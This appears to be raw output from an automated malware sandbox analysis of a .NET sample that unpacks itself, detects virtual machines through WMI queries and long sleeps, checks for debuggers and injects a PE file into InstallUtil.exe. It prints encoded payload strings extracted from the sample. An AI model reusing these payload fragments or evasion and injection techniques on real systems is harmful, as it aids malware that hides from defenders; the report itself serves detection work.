Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FsZ.cs	Base64 encoded string: 'H4sIAAAAAAAEAF2UX3eiMBDFP9C+EN2260MfWsu/rIaCECBvErSgAdkDK8qn31Ave2ofPGd+3Jk7M5D4/OzvFXOyQlRe6Ud+2W/EcInTqjm474x/MqFO/uheo1e6XJVG7cpgLgthut3Lhl65LdpFFQw0EQPntOyVV/bW1rBseWKVLPhMal4pXktDe8pFJf6qmXxg2ucyeS+TI03SM7Vlc5mld/nBPDuxOlO8kodvNcXFzpomEa2qxH1NJc9sJpugusvvrFgY3zw6q5I1tzMV3J5Pu0tVy7PesynuPQ7sngeie4lvz8b++VwO+h3czcUS0XSz7AyP/70sOy+CeGe8JplSTtZa8dbQ76PXO58fZqKhy6SNZrK1KjH6q0u8rfTM9UO8HRZjbZIeWS0Vm+dnWqdKJOmga55o6ZXyGLx9fsfl+tEtI24d3fbl4JVr4i/197yeDm7EeBjqmHzGJPp6BhxqBl+ZBVawHs9BZMswNyNBCRtykw1c8Z7XYUAdr/vgQcR5uKfEN8cZwGVfuqXu4VgmH+PFuJfeZ9wpQHwAG+AT2AT/AFPwnt74J/gX9Bb8BA4nHfkWWEF/A79Ad8AV9AS8g74Bd9Bj8BHMwX/AvXvjv+DjtA/8bHADPQJ/gFcTI38JLqB30/f2VfT2qtzW3ez1XXy/3UcVjedQ//bgLfg37mt+4+n+kvWN1Qr5PnT3xhz1HPUE/iSBHqMe/UiKfvBX0C0f/UPw1I8jnv5PPPSDTgLkT/NkYOxLsI+VQp/8MK9CP4J6BT+F+RXmJR7qmY5349mN9JkO6XX3D5suhGc4BQAA', 'H4sIAAAAAAAEADWR4YqjMBSFX0UxkVGSoqEMSN1gaQsmIKUgxF/RQsoGDJ2CKEbEZ990yzzA+e53zv2TPFnO/Kt/M2xgvrDtRd1V8CBcyF49W/sXbr42aKGEDgq2X7NXAW26ITBVhMrblGM57SAYM1zPYRTbjGwLIu3Ey84ioqbZo0t4kvrgbYY2dI+e8jWTwgBxHwKsNL1IHRNZ6bqaQoySztvSWIAlLoHOsBwVlH3m8rxU45vbeS6ftKOBm85sleeiHXkDEoTjKUyLJW6A3ZXAeaCPW1rYjgCdvu950iKs9ghX07G855n9cAx2LD82qWjLN4s24MQx6A2RJDvFy2UtlnYtbF9XY3e+TqF/zWmpfrjbjZ0jP/fZna80eaVoD57tFyXK5+fHwrEQrkc5E7WmWNo+ENEsOsuQOrpOQ4a358F1D5YiZVC+3dfM227OAbruOF6KX+dAN2o0rk/ngdcs2iTAdAjcHvPlOodWdrQGFsHWxHDrAyKHg9ueknd+Sw7CcSPg8vV6EI8lIMVyPP/+BCShbaYKboaXW8+hbD5u3cRq8AyEfN/7v7FuQB6etp8dLD4ccc8di3RCatU7VqkM79ueivsEYJFUbq9qjUdWX+d9FO9DW3wfS5Voj32zqGLcPv4B5d5bLIACAAA='
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs	Base64 encoded string: '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

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\378f89546d0e7df2feb0be104b3394406f42b927

Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FB5.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FB5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FB5.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 3.2.InstallUtil.exe.5980000.10.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.InstallUtil.exe.2b4d318.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.InstallUtil.exe.5c10000.13.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.InstallUtil.exe.5c30000.14.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.InstallUtil.exe.4351bc8.8.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.InstallUtil.exe.2b1c5c4.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.InstallUtil.exe.5950000.9.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: a9rLzLY498.exe

Static file information: File size 2114048 > 1048576

Source: a9rLzLY498.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x104400

Source: a9rLzLY498.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs	.Net Code: Ir7 System.AppDomain.Load(byte[])
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs	.Net Code: Ir7 System.Reflection.Assembly.Load(byte[])
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs	.Net Code: Ir7
Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, nLO.cs	.Net Code: h3h

Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0132CBDA push ds; ret		0_2_0132CBE5
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_01329F22 push ecx; ret		0_2_01329F35

Source: a9rLzLY498.exe

Static PE information: section name: .Sakut

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6788	Thread sleep count: 1067 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6796	Thread sleep count: 731 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1067			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 731			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: 0_2_0133F33A FindFirstFileExW,

0_2_0133F33A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: InstallUtil.exe, 00000003.00000002.255023049.0000000005840000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareDDH45C5_Win32_VideoControllerZ23_CD8WVideoController120060621000000.000000-0006.1925.5display.infMSBDAKL4WA9CEPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsNA6YT7MU
Source: InstallUtil.exe, 00000003.00000002.255023049.0000000005840000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: InstallUtil.exe, 00000003.00000002.255023049.000000000587B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: 0_2_01330D71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_01330D71

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Code function: 0_2_01342AB4 GetProcessHeap,

0_2_01342AB4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_01334DC5 mov ecx, dword ptr fs:[00000030h]		0_2_01334DC5
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_013404B5 mov eax, dword ptr fs:[00000030h]		0_2_013404B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0132A6B7 SetUnhandledExceptionFilter,	0_2_0132A6B7
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0132A230 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0132A230
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_01330D71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01330D71
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: 0_2_0132A555 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0132A555

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\a9rLzLY498.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 506000	Jump to behavior
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 508000	Jump to behavior
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8D6008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\a9rLzLY498.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\a9rLzLY498.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe			Jump to behavior
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: EnumSystemLocalesW,	0_2_01342190
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: EnumSystemLocalesW,	0_2_013421DB
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_01342852
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: GetLocaleInfoW,	0_2_013378EC
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_01342301
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: EnumSystemLocalesW,	0_2_013373C6
Source: C:\Users\user\Desktop\a9rLzLY498.exe	Code function: EnumSystemLocalesW,	0_2_01342276
